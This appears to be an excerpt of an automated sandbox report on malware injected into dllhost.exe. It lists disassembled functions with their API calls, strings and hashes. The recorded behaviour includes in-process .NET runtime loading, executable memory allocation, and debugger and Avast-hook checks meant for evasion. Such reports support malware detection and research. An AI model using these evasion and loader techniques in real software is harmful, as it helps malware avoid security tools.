                                                                                  • GetProcAddress.KERNEL32(00000000,KiUserExceptionDispatcher), ref: 7FE41E2A
                                                                                    • Part of subcall function 7FE411B0: memset.NTDLL ref: 7FE411D2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcmemset
                                                                                  • String ID: KiUserExceptionDispatcher$ntdll.dll
                                                                                  • API String ID: 3137504439-391726712
                                                                                  • Opcode ID: 11d2593c27cc74ef7a9c2590feb6ed6d42a7dd48463c0d874392180369953c0b
                                                                                  • Instruction ID: bf9c5516763da571611dd8505f09cccef45188715b9c227fe0ff8b64459f62f7
                                                                                  • Opcode Fuzzy Hash: 11d2593c27cc74ef7a9c2590feb6ed6d42a7dd48463c0d874392180369953c0b
                                                                                  • Instruction Fuzzy Hash: EA11B97AD01306BBCF129B66AC80CBFBB7DFF85264B21165EF90597101E734E55187A0
                                                                                  Function 7FE4344E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11librarystringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 189 7fe4344e-7fe4345f lstrcmpiA 190 7fe43461-7fe43468 189->190 191 7fe43469-7fe43473 LoadLibraryA 189->191
                                                                                  APIs
                                                                                  • lstrcmpiA.KERNEL32(?,psdk.dll), ref: 7FE43457
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 7FE4346D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadlstrcmpi
                                                                                  • String ID: psdk.dll
                                                                                  • API String ID: 2835099494-3943316854
                                                                                  • Opcode ID: 658ba54a6e6afa1ceea7d99fffde5ae9c732553f25227634ff1798c6c998681e
                                                                                  • Instruction ID: 97d830ea87723066c88d8f375328ca6ed4df18e57f180154a0a5a4c893f5857c
                                                                                  • Opcode Fuzzy Hash: 658ba54a6e6afa1ceea7d99fffde5ae9c732553f25227634ff1798c6c998681e
                                                                                  • Instruction Fuzzy Hash: F4C0C939208300ABDA024B55E908A197BA7AB80A55B54851CB84584120C330D429AB02
                                                                                  Function 7FE4194A Relevance: 5.1, APIs: 4, Instructions: 96memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 192 7fe4194a-7fe4196d call 7fe4257f 195 7fe41a53-7fe41a57 192->195 196 7fe41973-7fe41976 192->196 196->195 197 7fe4197c-7fe41982 196->197 197->195 198 7fe41988-7fe41992 call 7fe41a58 197->198 198->195 201 7fe41998-7fe419ad VirtualAlloc 198->201 201->195 202 7fe419b3-7fe419d3 memcpy 201->202 203 7fe41a05-7fe41a1d call 7fe41b03 202->203 204 7fe419d5 202->204 210 7fe41a45-7fe41a4d VirtualFree 203->210 211 7fe41a1f-7fe41a37 call 7fe41c64 203->211 206 7fe419d8-7fe419dc 204->206 208 7fe419f6-7fe41a03 206->208 209 7fe419de-7fe419f4 memcpy 206->209 208->203 208->206 209->208 210->195 211->210 214 7fe41a39-7fe41a3e 211->214 214->210 215 7fe41a40 214->215 215->210
                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040,00000000,?,?,?), ref: 7FE419A3
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE419C2
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE419EC
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 7FE41A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtualmemcpy$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 788548360-0
                                                                                  • Opcode ID: cee9e5a2a796590ad135f83df95848a426f52fc6f6f870058f101b6e77233287
                                                                                  • Instruction ID: d3b4805ca6afd1a5d8c4d5f4bd2ba4f5957bf034018e57e24973636439659fbd
                                                                                  • Opcode Fuzzy Hash: cee9e5a2a796590ad135f83df95848a426f52fc6f6f870058f101b6e77233287
                                                                                  • Instruction Fuzzy Hash: 6B31F672900304BFCF228F65ED45ABE77A9EF40369B20551EF906E3100E738E910A760
                                                                                  Function 7FE42018 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                    • Part of subcall function 7FE42233: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                    • Part of subcall function 7FE42233: NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  • SetErrorMode.KERNELBASE(?,?,?,00000000,?), ref: 7FE42078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentErrorInformationModeQuery
                                                                                  • String ID:
                                                                                  • API String ID: 3103590671-0
                                                                                  • Opcode ID: 452d2c7bb0da9ed907b922516a740015770f6e4014572d1439f8c07491cb26c7
                                                                                  • Instruction ID: c81483a2e740596f7359404f4a145b5a53b95d5c3c8a9364d5f7ea15b65275e3
                                                                                  • Opcode Fuzzy Hash: 452d2c7bb0da9ed907b922516a740015770f6e4014572d1439f8c07491cb26c7
                                                                                  • Instruction Fuzzy Hash: 42F0C2B29003017AEB116BA1AD01FBF36BEDF51744F11210CFE0295040F7E8E111CA22
                                                                                  Function 7FE420EC Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 233 7fe420ec-7fe420f6 LoadLibraryA
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE420F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                                                                  • Instruction ID: bbe97fb0fdf796f7d02d65c7dead2db828113409e6ff866594b2fea672e426be
                                                                                  • Opcode Fuzzy Hash: e58fb04bf8307ef9e59311ad68e6793ee857856729bfdc2c679c958526c6e4bd
                                                                                  • Instruction Fuzzy Hash: 71A00134108202AFCE029B14C84884ABFA1AF89391F048898B48987230C73198919A02
                                                                                  Function 7FE433B8 Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 234 7fe433b8-7fe433c2 LoadLibraryA
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE433BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: cdfcc11e70e0831f7f02528ebe527d00d7d7741163f98bb48def171ba165424e
                                                                                  • Instruction ID: 3afe84d9f853e1a58d27be4bc39f2d296b439f338d3e94088f2da92acf5e3481
                                                                                  • Opcode Fuzzy Hash: cdfcc11e70e0831f7f02528ebe527d00d7d7741163f98bb48def171ba165424e
                                                                                  • Instruction Fuzzy Hash: B390023950D101DBCE065B51D90C5197F67AB81351B148458B44540130C7314476DB12
                                                                                  Function 004F0011 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 235 4f0011-4f001e 236 4f002c-4f0034 235->236 237 4f0020-4f0023 235->237 238 4f0036-4f003e VirtualFree 236->238 239 4f0041-4f004a 236->239 237->236 238->239
                                                                                  APIs
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,004F0011,004F0005), ref: 004F003E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820325371.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_4f0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: 40190bf7e8cdf14306e3f29afdb8aada469a28eae5e895cba225020993eae487
                                                                                  • Instruction ID: 3c1f301522ef5015434a46749cad76ea0735bcdf9e2ead10c693429966e108f8
                                                                                  • Opcode Fuzzy Hash: 40190bf7e8cdf14306e3f29afdb8aada469a28eae5e895cba225020993eae487
                                                                                  • Instruction Fuzzy Hash: ADE0BF34240705AFDB305A35DC49F97B7E8AF44750F108819B5DAE7291CA64F8418B18
                                                                                  Function 7FE4256C Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 241 7fe4256c-7fe42571 242 7fe42573-7fe4257d free 241->242 243 7fe4257e 241->243 242->243
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 2fd9a7ee28f7a9333433644eb5513e4b942047d29e54c439f2e627505d0e5c23
                                                                                  • Instruction ID: f565952d912d69a959799ff31dc89a885d8eb9134e4b96f74b8ad5ccf2072eb3
                                                                                  • Opcode Fuzzy Hash: 2fd9a7ee28f7a9333433644eb5513e4b942047d29e54c439f2e627505d0e5c23
                                                                                  • Instruction Fuzzy Hash: 18B09235009300EBCA014E90D6083A9BBA6EB80616F20841CB057100A087344824EA02

                                                                                  Non-executed Functions

                                                                                  Function 7FE436D4 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 233memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 7FE436E1
                                                                                    • Part of subcall function 7FE43663: LoadLibraryW.KERNEL32(mscoree.dll,00000000,X>(",00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 7FE4377B
                                                                                  • memcpy.NTDLL(?,?,X>("), ref: 7FE437AB
                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 7FE4381A
                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 7FE43831
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 7FE43853
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 7FE4385A
                                                                                  • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 7FE4386D
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,?), ref: 7FE43881
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 7FE43894
                                                                                  • SafeArrayPutElement.OLEAUT32(7FE42E35,?,00000000), ref: 7FE438A2
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,00000001), ref: 7FE438BA
                                                                                  • SysAllocString.OLEAUT32(7FE453F4), ref: 7FE438C4
                                                                                  • SafeArrayPutElement.OLEAUT32(7FE42E35,?,00000000), ref: 7FE438D2
                                                                                  • SafeArrayDestroy.OLEAUT32(7FE42E35), ref: 7FE4390E
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 7FE43913
                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 7FE4392B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Create$DestroyVector$AllocBoundCommandElementLineString$ArgvInitializeLibraryLoadmemcpy
                                                                                  • String ID: X>("
                                                                                  • API String ID: 1402434309-2302009221
                                                                                  • Opcode ID: 5e5e04b494e50c0cdfeba50543377363f6c7516b20a2b1ab4e64372355080cbf
                                                                                  • Instruction ID: fc6f7cf24404cfcf3d7afd4173260bed971fdfda6a4a432beba6904d6f1273b5
                                                                                  • Opcode Fuzzy Hash: 5e5e04b494e50c0cdfeba50543377363f6c7516b20a2b1ab4e64372355080cbf
                                                                                  • Instruction Fuzzy Hash: 49916C75A00209EFDB00DFA5C884AEEBBB9FF48354F104068F90AEB260D731A956DF51
                                                                                  Function 7FE434AF Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 87libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                  • GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                  • GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                  • wcscmp.NTDLL ref: 7FE43525
                                                                                  • wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp
                                                                                  • String ID: 2$CorBindToRuntime$GetCORVersion$GetRequestedRuntimeInfo$v1.0.3705$v2.0.50727
                                                                                  • API String ID: 983638816-2194063276
                                                                                  • Opcode ID: 851bd8ff7da982f9098ecc1943af40099da2c3e3c62217fab860e5e858954dc2
                                                                                  • Instruction ID: 3e50560d5e1eeb36687fdd8f9e3dcfe970e9a1f44889845de766484beba81e0f
                                                                                  • Opcode Fuzzy Hash: 851bd8ff7da982f9098ecc1943af40099da2c3e3c62217fab860e5e858954dc2
                                                                                  • Instruction Fuzzy Hash: F6210E76D00309BFDF11CFE6DD849EEBBBDAB042A4F10912EB916E6140D774E604AB50
                                                                                  Function 7FE432D4 Relevance: 9.1, APIs: 6, Instructions: 73memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                  • memcpy.NTDLL(00000000,22283E58,?), ref: 7FE4333F
                                                                                  • memcpy.NTDLL(?,22283E58,00000000), ref: 7FE4336A
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$memcpy$AllocateFreeProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 722247336-0
                                                                                  • Opcode ID: 552fac5a70bfc6c263aafda12b09075c372027dd2ebab31769e8de2eac42fedc
                                                                                  • Instruction ID: e3500ff868ffef222200554de9f898f7f0b9cc85ff7932ac3d777bba641bc37d
                                                                                  • Opcode Fuzzy Hash: 552fac5a70bfc6c263aafda12b09075c372027dd2ebab31769e8de2eac42fedc
                                                                                  • Instruction Fuzzy Hash: 8F218D76900300EFCB11CFA9D884BAAB7F9FF44349F148459F91AE7111D771A598EB60
                                                                                  Function 7FE43663 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(mscoree.dll,00000000,X>(",00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                    • Part of subcall function 7FE434AF: GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43525
                                                                                    • Part of subcall function 7FE434AF: wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp$LibraryLoad
                                                                                  • String ID: X>("$mscoree.dll$v2.0.50727$v4.0.30319
                                                                                  • API String ID: 3438369058-3763104332
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction ID: d3d31f5be46057649fb9b99c077c88d5e31ad3076790e6f087b55fb3520f1749
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 26F0A972902325BFF71296657D41EFB75ACCB411D4F1021ADF901A2240D6B09E0076B5
                                                                                  Function 7FE31BC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                  • API String ID: 1646373207-3024904723
                                                                                  • Opcode ID: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction ID: 54fe31d5977995978b315a9fd433e02c4f518c0bef640df39cf22da13bcb4d8d
                                                                                  • Opcode Fuzzy Hash: fa89db43dd185a1453fcf4f790fbcd5a175520637a84c9a2fa416bbfb15f58e2
                                                                                  • Instruction Fuzzy Hash: E6E03039E0030AAFDB01CBA5CA0DF9DB6BDAF4526AB604159A805D6000E735D614EA10
                                                                                  Function 7FE43629 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436C9,CorBindToRuntime), ref: 7FE43635
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CorBindToRuntime$v2.0.50727$wks
                                                                                  • API String ID: 190572456-3347351501
                                                                                  • Opcode ID: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction ID: 0c5fc14341107e3be1e4a3b148c5bf2aaf3a514f9beb35c349b5f130446ce887
                                                                                  • Opcode Fuzzy Hash: 1c952edf47f5d967c480487307a17a198ad8a415b3d2b670942881798b77bc7c
                                                                                  • Instruction Fuzzy Hash: FCD02E32308323ABD6119E657C00FBABBA6AF402C0F00372DBE80EC124C341D035A38A
                                                                                  Function 7FE411B0 Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$DbgUserBreakPoint
                                                                                  • API String ID: 2221118986-3284380563
                                                                                  • Opcode ID: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction ID: bbb4ff28fefea5246b1a415e85eba509f200322f977f728c9ce93df5bd6fac56
                                                                                  • Opcode Fuzzy Hash: f41bbd2ad5d204c1819bf145e7111d98b5bb1373749e436e17a0d8b8869e6680
                                                                                  • Instruction Fuzzy Hash: 8F02F3148097C499DF138A68A0503FDBFF25F43228F28A68DE4E34B6E7C27D6249D356
                                                                                  Function 7FE31064 Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$combase.dll
                                                                                  • API String ID: 2221118986-1187780485
                                                                                  • Opcode ID: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction ID: 073b19536da68552c2ef516f0e74b594634c8d8f7233081d7479257ca9af4b1c
                                                                                  • Opcode Fuzzy Hash: a92cfde426eaf275d4cdb4ff5bbffa1fe7b5514eabfb562f5d1dbc9aa72339ae
                                                                                  • Instruction Fuzzy Hash: D702F724C087C599DB168A78805D3EDBFF29F43228F9986CDC4D31BA97C27E6249D352
                                                                                  Function 7FE42D84 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • memset.NTDLL ref: 7FE42D8F
                                                                                  • memset.NTDLL ref: 7FE42D9D
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$lstrlen
                                                                                  • String ID: /pkg/Loader.exe$X>("
                                                                                  • API String ID: 810095026-1983462030
                                                                                  • Opcode ID: 3d4c5262710afe944422458cd2da0bc82c01e9077a17efada0eb841bf3cd5f34
                                                                                  • Instruction ID: 53c5c49a1a72ff726aaeb956e843ea171699dcfe35651cd7620813fce0329fec
                                                                                  • Opcode Fuzzy Hash: 3d4c5262710afe944422458cd2da0bc82c01e9077a17efada0eb841bf3cd5f34
                                                                                  • Instruction Fuzzy Hash: A8E0DF7A6663007AD200CF0ABC41F3936ECE746B50F38220DBE44AE288D3E020094789
                                                                                  Function 7FE43586 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(7FE436AF,CLRCreateInstance), ref: 7FE4359C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: CLRCreateInstance$v4.0.30319
                                                                                  • API String ID: 190572456-303888047
                                                                                  • Opcode ID: ee11bf2f7cd5b6165e65e907bb3e342fbf2494dd9a6e8d7db98cfb98964fecc3
                                                                                  • Instruction ID: 4049353a07a8ef2bd98e8e00e1d987354befd7e798cdf1343371d813bbfb0654
                                                                                  • Opcode Fuzzy Hash: ee11bf2f7cd5b6165e65e907bb3e342fbf2494dd9a6e8d7db98cfb98964fecc3
                                                                                  • Instruction Fuzzy Hash: 3F215E70B04246EFEB10CF95E945FBE7BB9EF84255B10529CB806EB210D771EA11EB20
                                                                                  Function 004F02A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(7FE453B0), ref: 004F02B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820325371.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_4f0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: v2.0.50727$v4.0.30319
                                                                                  • API String ID: 1029625771-3789287155
                                                                                  • Opcode ID: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction ID: 7622eda474caacee72b1491d530f8e7e5a150ef8a972d25177cea66a555d9446
                                                                                  • Opcode Fuzzy Hash: 46fb0c6000660d2ecd93cfff72376eef47f50ecf2f9a5368e1c79332df3f6d6e
                                                                                  • Instruction Fuzzy Hash: 92F0A962A0221CBBDB1117955D49A7F765C8BC13D9F25016BFF01A2203D6B88E4192BD
                                                                                  Function 7FE31F30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(aswhook.dll,7FE31BBA), ref: 7FE31F35
                                                                                  • DisableThreadLibraryCalls.KERNEL32(00000000), ref: 7FE31F40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallsDisableHandleLibraryModuleThread
                                                                                  • String ID: aswhook.dll
                                                                                  • API String ID: 78584604-2561582699
